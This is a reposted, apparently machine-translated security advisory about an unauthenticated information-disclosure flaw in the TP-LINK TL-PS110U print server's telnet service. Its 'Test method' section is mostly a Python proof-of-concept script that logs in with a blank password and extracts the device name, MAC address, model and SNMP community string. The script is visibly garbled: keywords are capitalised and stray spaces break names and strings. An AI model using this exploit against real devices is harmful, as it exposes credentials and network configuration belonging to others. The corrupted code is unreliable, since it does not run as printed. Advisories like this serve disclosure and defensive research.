TP-LINK TL-PS110U Print Server 'tplink-enum. py' Security Bypass Vulnerability

Source: Internet
Author: User

Release date:
Updated on: 2013-06-23

Affected Systems:
TP-LINK TL-PS110U
Description:
--------------------------------------------------------------------------------
Bugtraq id: 60682
 
TL-PS110U is a single USB port printing server, it is specially designed for small and medium enterprises, schools, families, it provides easy and convenient Shared printing for all users on the LAN.
 
The TP-LINK TL-PS110U Print Server enables attackers to access configuration information without authentication when running the telnet service, including the device name, MAC address, vendor, model, SNMP community string.
 
<* Source: SANTHO

Link: http://www.exploit-db.com/exploits/26318/
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Import telnetlib
Import sys
Host = sys. argv [1]
Tn = telnetlib. Telnet (host)
Tn. read_until ("Password :")
Tn. write ("\ r \ n ")
Tn. read_until ("choice ")
Tn. write ("1 \ r \ n ")
Tn. read_until ("choice ")
Tn. write ("1 \ r \ n ")
Data = tn. read_until ("choice ")
For I in data. split ("\ r \ n "):
If "Device Name" in I:
Print I. strip ()
If "Node ID" in I:
Print I. strip ()
Tn. write ("0 \ r \ n ")
Tn. read_until ("choice ")
Tn. write ("2 \ r \ n ")
Data = tn. read_until ("choice ")
For I in data. split ("\ r \ n "):
If "Manufacture:" in I:
Print I. strip ()
If "Model:" in I:
Print I. strip ()
Tn. write ("0 \ r \ n ")
Tn. read_until ("choice ")
Tn. write ("5 \ r \ n ")
Data = tn. read_until ("choice ")
For I in data. split ("\ r \ n "):
If "Community" in I:
Print I. strip ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
TP-LINK
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://www.tp-link.com/en/products/details? Model = TL-PS110U

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.